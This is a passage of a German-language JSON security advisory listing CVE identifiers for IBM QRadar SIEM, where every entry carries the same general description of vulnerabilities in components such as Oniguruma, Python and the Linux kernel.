"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-45887"
},
{
"cve": "CVE-2022-45919",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-45919"
},
{
"cve": "CVE-2022-4744",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-4744"
},
{
"cve": "CVE-2022-48560",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-48560"
},
{
"cve": "CVE-2022-48564",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-48564"
},
{
"cve": "CVE-2022-48624",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2022-48624"
},
{
"cve": "CVE-2023-0458",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-0458"
},
{
"cve": "CVE-2023-0590",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-0590"
},
{
"cve": "CVE-2023-0597",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-0597"
},
{
"cve": "CVE-2023-1073",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1073"
},
{
"cve": "CVE-2023-1074",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1074"
},
{
"cve": "CVE-2023-1075",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1075"
},
{
"cve": "CVE-2023-1079",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1079"
},
{
"cve": "CVE-2023-1118",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1118"
},
{
"cve": "CVE-2023-1192",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1192"
},
{
"cve": "CVE-2023-1206",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1206"
},
{
"cve": "CVE-2023-1252",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1252"
},
{
"cve": "CVE-2023-1382",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1382"
},
{
"cve": "CVE-2023-1786",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1786"
},
{
"cve": "CVE-2023-1838",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1838"
},
{
"cve": "CVE-2023-1855",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1855"
},
{
"cve": "CVE-2023-1989",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1989"
},
{
"cve": "CVE-2023-1998",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-1998"
},
{
"cve": "CVE-2023-20569",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-20569"
},
{
"cve": "CVE-2023-2162",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-2162"
},
{
"cve": "CVE-2023-2163",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-2163"
},
{
"cve": "CVE-2023-2166",
"notes": [
{
"category": "description",
